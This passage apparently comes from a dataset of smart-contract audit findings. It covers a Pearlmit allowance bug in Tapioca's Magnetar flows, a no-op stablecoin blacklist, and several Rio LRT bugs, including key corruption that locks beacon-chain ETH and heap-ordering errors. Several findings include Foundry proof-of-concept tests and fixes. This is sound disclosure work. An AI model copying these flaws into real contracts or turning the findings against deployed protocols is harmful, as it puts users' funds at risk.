IERC20(_token).balanceOf(address(this));\\n if (balanceAfter <= balanceBefore) revert Magnetar_ExtractTokenFail();\\n return balanceAfter - balanceBefore;\\n }\\n```\\n\\nThe collateral gets transferred into the Magnetar contract in case the `msg._user` has given sufficient allowance to the Magnetar contract through the Pearlmit contract.\\nAfter this `_setApprovalForYieldBox(data.market, yieldBox_);` is called that sets the allowance of the Magnetar contract to the Market contract.\\nThen `addCollateral` is called on the Market contract. I've inlined the internal function to make it easier to follow:\\n```\\n function _addCollateral(address from, address to, bool skim, uint256 amount, uint256 share) internal {\\n if (share == 0) {\\n share = yieldBox.toShare(collateralId, amount, false);\\n }\\n uint256 oldTotalCollateralShare = totalCollateralShare;\\n userCollateralShare[to] += share;\\n totalCollateralShare = oldTotalCollateralShare + share;\\n\\n // yieldBox.transfer(from, address(this), _assetId, share);\\n bool isErr = pearlmit.transferFromERC1155(from, address(this), address(yieldBox), collateralId, share);\\n if (isErr) {\\n revert TransferFailed();\\n }\\n }\\n```\\n\\nAfter the `userCollateralShare` mapping is updated `pearlmit.transferFromERC1155(from, address(this), address(yieldBox), collateralId, share);` gets called.\\nThis is critical as now the Magnetar is supposed to transfer the ERC1155 tokens(Yieldbox) to the Market contract.\\nIn order to do this the Magnetar contract should have given the allowance to the Market contract through the Pearlmit contract.\\nThis is not the case, the Magnetar has only executed `_setApprovalForYieldBox(data.market, yieldBox_);`, nothing else.\\nIt will revert inside the Pearlmit contract `transferFromERC1155` function when the allowance is being checked.\\nOther occurrences\\n`TOFT::mintLendXChainSGLXChainLockAndParticipateReceiver` has a similar issue as:\\nExtract the bbCollateral from the user, sets approval for 
the BigBang contract through YieldBox.\\nBut then inside the `BBCollateral::addCollateral` the `_addTokens` again expects an allowance through the Pearlmit contract.\\n`TOFT::lockAndParticipateReceiver` calls the `Magnetar:lockAndParticipate` where:\\n```\\n## MagnetarMintCommonModule.sol\\n\\nfunction _lockOnTOB(\\n IOptionsLockData memory lockData,\\n IYieldBox yieldBox_,\\n uint256 fraction,\\n bool participate,\\n address user,\\n address singularityAddress\\n ) internal returns (uint256 tOLPTokenId) {\\n // rest of code.\\n _setApprovalForYieldBox(lockData.target, yieldBox_);\\n tOLPTokenId = ITapiocaOptionLiquidityProvision(lockData.target).lock(\\n participate ? address(this) : user, singularityAddress, lockData.lockDuration, lockData.amount\\n );\\n}\\n\\n## TapiocaOptionLiquidityProvision.sol\\n\\nfunction lock(address _to, IERC20 _singularity, uint128 _lockDuration, uint128 _ybShares)\\n external\\n nonReentrant\\n returns (uint256 tokenId)\\n{\\n // Transfer the Singularity position to this contract\\n // yieldBox.transfer(msg.sender, address(this), sglAssetID, _ybShares);\\n {\\n bool isErr =\\n pearlmit.transferFromERC1155(msg.sender, address(this), address(yieldBox), sglAssetID, _ybShares);\\n if (isErr) {\\n revert TransferFailed();\\n }\\n }\\n```\\n\\nThe same issue where approval through the Pearlmit contract is expected.чReview all the allowance mechanisms and ensure that they are correct.чThe `TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken and will revert when the Magnetar contract tries to transfer the ERC1155 tokens to the Market contract. 
There are also other instances of similar issues.ч```\\n function _extractTokens(address _from, address _token, uint256 _amount) internal returns (uint256) {\\n uint256 balanceBefore = IERC20(_token).balanceOf(address(this));\\n // IERC20(_token).safeTransferFrom(_from, address(this), _amount);\\n pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);\\n uint256 balanceAfter = IERC20(_token).balanceOf(address(this));\\n if (balanceAfter <= balanceBefore) revert Magnetar_ExtractTokenFail();\\n return balanceAfter - balanceBefore;\\n }\\n```\\n -Blacklisted accounts can still transact.чmediumчAccounts that have been blacklisted by the `BLACKLISTER_ROLE` continue to transact normally.\\nCurrently, the only real effect of blacklisting an account is the seizure of `Stablecoin` funds:\\n```\\n/**\\n * @notice Overrides Blacklist function to transfer balance of a blacklisted user to the caller.\\n * @dev This function is called internally when an account is blacklisted.\\n * @param user The blacklisted user whose balance will be transferred.\\n */\\nfunction _onceBlacklisted(address user) internal override {\\n _transfer(user, _msgSender(), balanceOf(user));\\n}\\n```\\n\\nHowever, following a call to `addBlackList(address)`, the blacklisted account may continue to transact using `Stablecoin`.\\nCombined with previous audit reports, which attest to the blacklist function's susceptibility to frontrunning, the current implementation of the blacklist operation can effectively be considered a no-op.чERC20s that enforce blacklists normally prevent a sanctioned address from being able to transact:\\n📄 Stablecoin.sol\\n```\\n// Add the line below\\n error Blacklisted(address account);\\n\\n// Add the line below\\nfunction _update(address from, address to, uint256 value) internal virtual override {\\n// Add the line below\\n\\n// Add the line below\\n if (blacklisted(from)) revert Blacklisted(from); \\n// Add the line below\\n if (blacklisted(to)) revert 
Blacklisted(to);\\n// Add the line below\\n\\n// Add the line below\\n super._update(from, to, value);\\n// Add the line below\\n}\\n```\\nчMedium, as this is the failure of a manually administered security feature.ч```\\n/**\\n * @notice Overrides Blacklist function to transfer balance of a blacklisted user to the caller.\\n * @dev This function is called internally when an account is blacklisted.\\n * @param user The blacklisted user whose balance will be transferred.\\n */\\nfunction _onceBlacklisted(address user) internal override {\\n _transfer(user, _msgSender(), balanceOf(user));\\n}\\n```\\n -Setting the strategy cap to \"0\" does not update the total shares held or the withdrawal queueчhighчRemoving or setting the strategy cap to 0 will not decrease the shares held in the system. Additionally, it will not update the withdrawal queue, which means users can request withdrawals, and the withdrawals will exceed the allocated amount when rebalance occurs.\\nLet's go over the issue with an example:\\nAssume there is 1 strategy and 2 operators active in an LSR with total strategy shares holding is 1000 * 1e18 where both operators shares 500-500 the assets.\\nWhen the owner decides to inactivate or just simply sets one of the operators cap to \"0\" the operator will withdraw all its assets as follows:\\n```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .
\\n // @review this \"if\" will be executed\\n -> if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n utilizationHeap.removeByID(operatorId);\\n } else if (currentShareDetails.cap == 0 && newShareCap.cap > 0) {\\n // If the current cap is 0 and the new cap is greater than 0, insert the operator into the heap.\\n utilizationHeap.insert(OperatorUtilizationHeap.Operator(operatorId, 0));\\n } else {\\n // Otherwise, update the operator's utilization in the heap.\\n utilizationHeap.updateUtilizationByID(operatorId, currentShareDetails.allocation.divWad(newShareCap.cap));\\n }\\n .\\n }\\n```\\n\\n```\\nfunction queueOperatorStrategyExit(IRioLRTOperatorRegistry.OperatorDetails storage operator, uint8 operatorId, address strategy) internal {\\n .\\n // @review asks delegator to exit\\n -> bytes32 withdrawalRoot = delegator.queueWithdrawalForOperatorExit(strategy, sharesToExit);\\n emit IRioLRTOperatorRegistry.OperatorStrategyExitQueued(operatorId, strategy, sharesToExit, withdrawalRoot);\\n }\\n```\\n\\nThen the operator delegator contract calls the EigenLayer to withdraw all its balance as follows:\\n```\\nfunction _queueWithdrawalForOperatorExitOrScrape(address strategy, uint256 shares) internal returns (bytes32 root) {\\n . 
// @review jumps to internal function\\n -> root = _queueWithdrawal(strategy, shares, address(depositPool()));\\n }\\n\\nfunction _queueWithdrawal(address strategy, uint256 shares, address withdrawer) internal returns (bytes32 root) {\\n IDelegationManager.QueuedWithdrawalParams[] memory withdrawalParams = new IDelegationManager.QueuedWithdrawalParams[](1);\\n withdrawalParams[0] = IDelegationManager.QueuedWithdrawalParams({\\n strategies: strategy.toArray(),\\n shares: shares.toArray(),\\n withdrawer: withdrawer\\n });\\n // @review calls Eigen layer to queue all the balance and returns the root\\n -> root = delegationManager.queueWithdrawals(withdrawalParams)[0];\\n }\\n```\\n\\nWhich we can observe from the above snippet the EigenLayer is called for the withdrawal and then the entire function execution ends. The problem is `assetRegistry` still thinks there are 1000 * 1e18 EigenLayer shares in the operators. Also, the `withdrawalQueue` is not aware of this withdrawal request which means that users can call `requestWithdrawal` to withdraw up to 1000 * 1e18 EigenLayer shares worth LRT but in reality the 500 * 1e18 portion of it already queued in withdrawal by the owner of operator registry.\\nCoded PoC:\\n```\\nfunction test_SettingStrategyCapZero_WithdrawalsAreDoubleCountable() public {\\n IRioLRTOperatorRegistry.StrategyShareCap[] memory zeroStrategyShareCaps =\\n new IRioLRTOperatorRegistry.StrategyShareCap[](2);\\n zeroStrategyShareCaps[0] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: RETH_STRATEGY, cap: 0});\\n zeroStrategyShareCaps[1] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: CBETH_STRATEGY, cap: 0});\\n\\n uint8 operatorId = addOperatorDelegator(reLST.operatorRegistry, address(reLST.rewardDistributor));\\n\\n uint256 AMOUNT = 111e18;\\n\\n // Allocate to cbETH strategy.\\n cbETH.approve(address(reLST.coordinator), type(uint256).max);\\n uint256 lrtAmount = reLST.coordinator.deposit(CBETH_ADDRESS, AMOUNT);\\n\\n // Push funds into 
EigenLayer.\\n vm.prank(EOA, EOA);\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n\\n vm.recordLogs();\\n reLST.operatorRegistry.setOperatorStrategyShareCaps(operatorId, zeroStrategyShareCaps);\\n\\n Vm.Log[] memory entries = vm.getRecordedLogs();\\n assertGt(entries.length, 0);\\n\\n for (uint256 i = 0; i < entries.length; i++) {\\n if (entries[i].topics[0] == keccak256('OperatorStrategyExitQueued(uint8,address,uint256,bytes32)')) {\\n uint8 emittedOperatorId = abi.decode(abi.encodePacked(entries[i].topics[1]), (uint8));\\n (address strategy, uint256 sharesToExit, bytes32 withdrawalRoot) =\\n abi.decode(entries[i].data, (address, uint256, bytes32));\\n\\n assertEq(emittedOperatorId, operatorId);\\n assertEq(strategy, CBETH_STRATEGY);\\n assertEq(sharesToExit, AMOUNT);\\n assertNotEq(withdrawalRoot, bytes32(0));\\n\\n break;\\n }\\n if (i == entries.length - 1) fail('Event not found');\\n }\\n\\n // @review add these\\n // @review all the eigen layer shares are already queued as we checked above, now user requestWithdrawal\\n // of the same amount of EigenLayer share worth of LRT which there will be double counting when epoch is settled.\\n uint256 queuedShares = reLST.coordinator.requestWithdrawal(address(cbETH), lrtAmount);\\n console.log(\"Queued shares\", queuedShares);\\n }\\n```\\nчUpdate the withdrawal queue when the operator registry admin changes the EigenLayer shares amount by either removing an operator or setting its strategy cap to \"0\".чHigh, because the users withdrawals will never go through in rebalancing because of double counting of the same share withdrawals.ч```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n . 
\\n // @review this \"if\" will be executed\\n -> if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n utilizationHeap.removeByID(operatorId);\\n } else if (currentShareDetails.cap == 0 && newShareCap.cap > 0) {\\n // If the current cap is 0 and the new cap is greater than 0, insert the operator into the heap.\\n utilizationHeap.insert(OperatorUtilizationHeap.Operator(operatorId, 0));\\n } else {\\n // Otherwise, update the operator's utilization in the heap.\\n utilizationHeap.updateUtilizationByID(operatorId, currentShareDetails.allocation.divWad(newShareCap.cap));\\n }\\n .\\n }\\n```\\n -swapValidatorDetails incorrectly writes keys to memory, resulting in permanently locked beacon chain depositsчhighчWhen loading BLS public keys from storage to memory, the keys are partly overwritten with zero bytes. 
This ultimately causes allocations of these malformed public keys to permanently lock deposited ETH in the beacon chain deposit contract.\\nValidatorDetails.swapValidatorDetails is used by RioLRTOperatorRegistry.reportOutOfOrderValidatorExits to swap the details in storage of validators which have been exited out of order:\\n```\\n// Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\nVALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n```\\n\\nIn swapValidatorDetails, for each swap to occur, we load two keys into memory from storage:\\n```\\nkeyOffset1 = position.computeStorageKeyOffset(operatorId, startIndex1);\\nkeyOffset2 = position.computeStorageKeyOffset(operatorId, startIndex2);\\nassembly {\\n // Load key1 into memory\\n let _part1 := sload(keyOffset1) // Load bytes 0..31\\n let _part2 := sload(add(keyOffset1, 1)) // Load bytes 32..47\\n mstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n\\n isEmpty := iszero(or(_part1, _part2)) // Store if key1 is empty\\n\\n // Load key2 into memory\\n _part1 := sload(keyOffset2) // Load bytes 0..31\\n _part2 := sload(add(keyOffset2, 1)) // Load bytes 32..47\\n mstore(add(key2, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key2, 0x30), shr(128, _part2)) // Store bytes 16..47\\n\\n isEmpty := or(isEmpty, iszero(or(_part1, _part2))) // Store if key1 or key2 is empty\\n}\\n```\\n\\nThe problem here is that when we store the keys in memory, they don't end up as intended. Let's look at how it works to see where it goes wrong.\\nThe keys used here are BLS public keys, with a length of 48 bytes, e.g.: `0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb8af94bc3ba4d4bfa93d087d522e4b78d`. 
As such, previously to entering this for loop, we initialize key1 and key2 in memory as 48 byte arrays:\\n```\\nbytes memory key1 = new bytes(48);\\nbytes memory key2 = new bytes(48);\\n```\\n\\nSince they're longer than 32 bytes, they have to be stored in two separate storage slots, thus we do two sloads per key to retrieve `_part1` and `_part2`, containing the first 32 bytes and the last 16 bytes respectively.\\nThe following lines are used with the intention of storing the key in two separate memory slots, similarly to how they're stored in storage:\\n```\\nmstore(add(key1, 0x20), _part1) // Store bytes 0..31\\nmstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n```\\n\\nThe problem however is that the second mstore shifts `_part2` 128 bits to the right, causing the leftmost 128 bits to zeroed. Since this mstore is applied only 16 (0x10) bytes after the first mstore, we overwrite bytes 16..31 with zero bytes. We can test this in chisel to prove it:\\nUsing this example key: `0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb8af94bc3ba4d4bfa93d087d522e4b78d`\\nWe assign the first 32 bytes to _part1:\\n```\\nbytes32 _part1 = 0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb\\n```\\n\\nWe assign the last 16 bytes to _part2:\\n```\\nbytes32 _part2 = bytes32(bytes16(0x8af94bc3ba4d4bfa93d087d522e4b78d))\\n```\\n\\nWe assign 48 bytes in memory for key1:\\n```\\nbytes memory key1 = new bytes(48);\\n```\\n\\nAnd we run the following snippet from swapValidatorDetails in chisel:\\n```\\nassembly {\\n mstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n}\\n```\\n\\nNow we can check the resulting memory using `!memdump`, which outputs the following:\\n```\\n➜ !memdump\\n[0x00:0x20]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x20:0x40]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x40:0x60]: 
0x00000000000000000000000000000000000000000000000000000000000000e0\\n[0x60:0x80]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x80:0xa0]: 0x0000000000000000000000000000000000000000000000000000000000000030\\n[0xa0:0xc0]: 0x95cfcb859956953f9834f8b14cdaa93900000000000000000000000000000000\\n[0xc0:0xe0]: 0x8af94bc3ba4d4bfa93d087d522e4b78d00000000000000000000000000000000\\n```\\n\\nWe can see from the memory that at the free memory pointer, the length of key1 is defined 48 bytes (0x30), and following it is the resulting key with 16 bytes zeroed in the middle of the key.чWe can solve this by simply mstoring `_part2` prior to mstoring `_part1`, allowing the mstore of `_part1` to overwrite the zero bytes from _part2:\\n```\\nmstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\nmstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n```\\n\\nNote that the above change must be made for both keys.чWhenever we swapValidatorDetails using reportOutOfOrderValidatorExits, both sets of validators will have broken public keys and when allocated to will cause ETH to be permanently locked in the beacon deposit contract.\\nWe can see how this manifests in allocateETHDeposits where we retrieve the public keys for allocations:\\n```\\n// Load the allocated validator details from storage and update the deposited validator count.\\n(pubKeyBatch, signatureBatch) = ValidatorDetails.allocateMemory(newDepositAllocation);\\nVALIDATOR_DETAILS_POSITION.loadValidatorDetails(\\n operatorId, validators.deposited, newDepositAllocation, pubKeyBatch, signatureBatch, 0\\n);\\n// rest of code\\nallocations[allocationIndex] = OperatorETHAllocation(operator.delegator, newDepositAllocation, pubKeyBatch, signatureBatch);\\n```\\n\\nWe then use the public keys to stakeETH:\\n```\\n(uint256 depositsAllocated, IRioLRTOperatorRegistry.OperatorETHAllocation[] memory allocations) = operatorRegistry.allocateETHDeposits(\\n depositCount\\n);\\ndepositAmount = depositsAllocated * 
ETH_DEPOSIT_SIZE;\\n\\nfor (uint256 i = 0; i < allocations.length; ++i) {\\n uint256 deposits = allocations[i].deposits;\\n\\n IRioLRTOperatorDelegator(allocations[i].delegator).stakeETH{value: deposits * ETH_DEPOSIT_SIZE}(\\n deposits, allocations[i].pubKeyBatch, allocations[i].signatureBatch\\n );\\n}\\n```\\n\\nUltimately for each allocation, the public key is passed to the beacon DepositContract.deposit where it deposits to a public key for which we don't have the associated private key and thus can never withdraw.ч```\\n// Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\nVALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n```\\n -`reportOutOfOrderValidatorExits` does not updates the heap orderчhighчWhen an operator's validator exits without a withdrawal request, the owner can invoke the `reportOutOfOrderValidatorExits` function to increase the `exited` portion of the operator validators. However, this action does not update the heap. 
Consequently, during subsequent allocation or deallocation processes, the heap may incorrectly mark validators as `exited`.\\nFirst, let's see how the utilization is determined for native ETH deposits for operators which is calculated as: `operatorShares.allocation.divWad(operatorShares.cap)` where as the allocation is the total `deposited` validators and the `cap` is predetermined value by the owner of the registry.\\nWhen the heap is retrieved from the storage, here how it is fetched:\\n```\\nfunction getOperatorUtilizationHeapForETH(RioLRTOperatorRegistryStorageV1.StorageV1 storage s)\\n internal\\n view\\n returns (OperatorUtilizationHeap.Data memory heap)\\n {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n\\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n\\n uint256 activeDeposits;\\n IRioLRTOperatorRegistry.OperatorValidatorDetails memory validators;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = s.activeOperatorsByETHDepositUtilization.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n validators = s.operatorDetails[operatorId].validatorDetails;\\n activeDeposits = validators.deposited - validators.exited;\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: activeDeposits.divWad(validators.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n\\nas we can see, the heap is always assumed to be order in the storage when the registry fetches it initially. 
There are no ordering of the heap when requesting the heap initially.\\nWhen, say the deallocation happens via an user withdrawal request, the queue can exit early if the operator in the heap has \"0\" room:\\n```\\n function deallocateETHDeposits(uint256 depositsToDeallocate) external onlyCoordinator returns (uint256 depositsDeallocated, OperatorETHDeallocation[] memory deallocations) {\\n deallocations = new OperatorETHDeallocation[](s.activeOperatorCount);\\n\\n\\n OperatorUtilizationHeap.Data memory heap = s.getOperatorUtilizationHeapForETH();\\n if (heap.isEmpty()) revert NO_AVAILABLE_OPERATORS_FOR_DEALLOCATION();\\n\\n\\n uint256 deallocationIndex;\\n uint256 remainingDeposits = depositsToDeallocate;\\n\\n\\n bytes memory pubKeyBatch;\\n while (remainingDeposits > 0) {\\n uint8 operatorId = heap.getMax().id;\\n\\n\\n OperatorDetails storage operator = s.operatorDetails[operatorId];\\n OperatorValidatorDetails memory validators = operator.validatorDetails;\\n -> uint256 activeDeposits = validators.deposited - validators.exited;\\n\\n\\n // Exit early if the operator with the highest utilization rate has no active deposits,\\n // as no further deallocations can be made.\\n -> if (activeDeposits == 0) break;\\n .\\n }\\n .\\n }\\n```\\n\\n`reportOutOfOrderValidatorExits` increases the \"exited\" part of the operators validator:\\n```\\nfunction reportOutOfOrderValidatorExits(uint8 operatorId, uint256 fromIndex, uint256 validatorCount) external {\\n .\\n .\\n // Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\n VALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n -> operator.validatorDetails.exited += uint40(validatorCount);\\n\\n emit OperatorOutOfOrderValidatorExitsReported(operatorId, validatorCount);\\n }\\n```\\n\\nNow, knowing all these above, let's do an example where calling `reportOutOfOrderValidatorExits` can make the heap 
work wrongly and exit prematurely.\\nAssume there are 3 operators which has native ETH deposits. operatorId 1 -> utilization 5% operatorId 2 -> utilization 10% operatorId 3 -> utilization 15%\\nsuch operators would be ordered in the heap as: heap.operators[1] -> operatorId: 1, utilization: 5 heap.operators[2] -> operatorId: 2, utilization: 10 heap.operators[3] -> operatorId: 3, utilization: 15 heap.getMin() -> operatorId: 1, utilization: 5 heap.getMax() -> operatorId:3, utilization 15\\nnow, let's say the \"cap\" is 100 for all of the operators which means that: operatorId 1 -> validator.deposits = 5, validator.exit = 0 operatorId 2 -> validator.deposits = 10, validator.exit = 0 operatorId 3 -> validator.deposits = 15, validator.exit = 0\\nLet's assume that the operator 3 exits 15 validator from beacon chain without prior to a user request, which is a reason for owner to call `reportOutOfOrderValidatorExits` to increase the exited validators.\\nWhen the owner calls `reportOutOfOrderValidatorExits` for the operatorId 3, the exited will be 15 for the operatorId 3. After the call the operators validator balances will be: operatorId 1 -> validator.deposits = 5, validator.exit = 0 operatorId 2 -> validator.deposits = 10, validator.exit = 8 operatorId 3 -> validator.deposits = 15, validator.exit = 15\\nhence, the utilizations will be: operatorId 1 -> utilization 5% operatorId 2 -> utilization 10% operatorId 3 -> utilization 0%\\nwhich means now the operatorId 3 has the lowest utilization and should be the first to get deposits and last to unwind deposits from. 
However, the heap is not re-ordered meaning that the minimum in the heap is still opeartorId 1 and the maximum is still operatorId 3!\\nNow, when a user tries to withdraw, the first deallocation target will be the operatorId 3 because the heap thinks that it is the most utilized still.\\nHence, the user will not be able to request the withdrawal!\\nCoded PoC:\\n```\\n// forge test --match-contract OperatorUtilizationHeapTest --match-test test_RemovingValidatorMessesTheHeap -vv\\n function test_RemovingValidatorMessesTheHeap() public {\\n OperatorUtilizationHeap.Data memory heap = OperatorUtilizationHeap.initialize(5);\\n\\n // @review initialize and order 3 operators \\n heap.insert(OperatorUtilizationHeap.Operator({id: 1, utilization: 5}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 2, utilization: 10}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 3, utilization: 15}));\\n heap.store(heapStore);\\n\\n // @review mimick how the heap can be fetched from the storage initially\\n uint8 numActiveOperators = 3;\\n OperatorUtilizationHeap.Data memory newHeap = OperatorUtilizationHeap.initialize(64);\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = heapStore.get(i);\\n if (operatorId == 0) break;\\n\\n newHeap.operators[i+1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: heap.operators[operatorId].utilization\\n });\\n }\\n newHeap.count = i;\\n\\n // @review assume the reportValidatorAndExits called, and now the utilization is \"0\"\\n heap.updateUtilizationByID(3, 0);\\n // @review this should be done, but the heap is not stored! 
\\n // heap.store(heapStore);\\n\\n console.log(\"1st\", heap.operators[1].id);\\n console.log(\"2nd\", heap.operators[2].id);\\n console.log(\"3rd\", heap.operators[3].id);\\n console.log(\"origin heaps min\", heap.getMin().id);\\n console.log(\"origin heaps max\", heap.getMax().id);\\n\\n console.log(\"1st\", newHeap.operators[1].id);\\n console.log(\"2nd\", newHeap.operators[2].id);\\n console.log(\"3rd\", newHeap.operators[3].id);\\n console.log(\"new heaps min\", newHeap.getMin().id);\\n console.log(\"new heaps max\", newHeap.getMax().id);\\n\\n // @review mins and maxs are mixed\\n assertEq(newHeap.getMin().id, 1);\\n assertEq(heap.getMin().id, 3);\\n assertEq(heap.getMax().id, 2);\\n assertEq(newHeap.getMax().id, 3);\\n }\\n```\\nчupdate the utilization in the reportOutOfOrderValidatorExits functionчHeap can be mixed, withdrawals and deposits can fail, hence I will label this as high.ч```\\nfunction getOperatorUtilizationHeapForETH(RioLRTOperatorRegistryStorageV1.StorageV1 storage s)\\n internal\\n view\\n returns (OperatorUtilizationHeap.Data memory heap)\\n {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n\\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n\\n uint256 activeDeposits;\\n IRioLRTOperatorRegistry.OperatorValidatorDetails memory validators;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = s.activeOperatorsByETHDepositUtilization.get(i);\\n\\n // Non-existent operator ID. 
We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n validators = s.operatorDetails[operatorId].validatorDetails;\\n activeDeposits = validators.deposited - validators.exited;\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: activeDeposits.divWad(validators.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n -Heap is incorrectly stores the removed operator ID which can lead to division by zero in deposit/withdrawal flowчhighчAn operator's strategy can be reset by the owner calling `setOperatorStrategyCaps` to \"0\". This action sets the utilization to \"0\" and removes the operator from the heap. Consequently, this means that the operator has unwound all its strategy shares and can no longer receive any more deposits. However, due to how the heap is organized, if an operator who had funds before is reset to \"0\", the heap will not successfully remove the operator. As a result, when ordering the heap, a division by \"0\" will occur, causing the transaction to revert on deposits and withdrawals indefinitely.\\nIn order to break down the issue, let's divide the issue to 2 parts which their combination is the issue itself\\n1- Heap is not removing the removed ID from the heaps storage when the operator is removed\\nWhen the operator is removed, the operator will be removed from the heap as follows:\\n```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .\\n OperatorUtilizationHeap.Data memory utilizationHeap = s.getOperatorUtilizationHeapForStrategy(newShareCap.strategy);\\n // If the current cap is greater than 0 and the new cap is 0, remove the operator from the strategy.\\n if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n 
operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n -> utilizationHeap.removeByID(operatorId);\\n }\\n .\\n\\n // Persist the updated heap to the active operators tracking.\\n -> utilizationHeap.store(s.activeOperatorsByStrategyShareUtilization[newShareCap.strategy]);\\n .\\n }\\n```\\n\\n`removeByID` calls the internal `_remove` function which is NOT removes the last element! `self.count` is decreased however, the index is still the previous value of the `self.count`\\n```\\nfunction _remove(Data memory self, uint8 i) internal pure {\\n self.operators[i] = self.operators[self.count--];\\n }\\n```\\n\\nFor example, if there are 3 operators as follows: operatorId: 1, utilization: 50% operatorId: 2, utilization: 60% operatorId: 3, utilization: 70% then, the `heap.count` would be 3 and the order would be: 1, 2, 3 in the heap heap.operators[1] = operatorId 1 heap.operators[2] = operatorId 2 heap.operators[3] = operatorId 3\\nif we remove the operator Id 2: `heap.count` = 2 order: 1,3 heap.operators[1] = operatorId 1 heap.operators[2] = operatorId 2 heap.operators[3] = operatorId 0 THIS SHOULD BE \"0\" since its removed but it is \"3\" in the current implementation!\\nAs shown here, the operators[3] should be \"0\" since there isn't any operator3 in the heap anymore but the heap keeps the value and not resets it.\\nHere a test shows the above issue:\\n```\\n// forge test --match-contract OperatorUtilizationHeapTest --match-test test_removingDoesNotUpdatesStoredHeap -vv\\n function test_removingDoesNotUpdatesStoredHeap() public {\\n OperatorUtilizationHeap.Data memory heap = OperatorUtilizationHeap.initialize(5);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 1, utilization: 50}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 2, utilization: 60}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 3, 
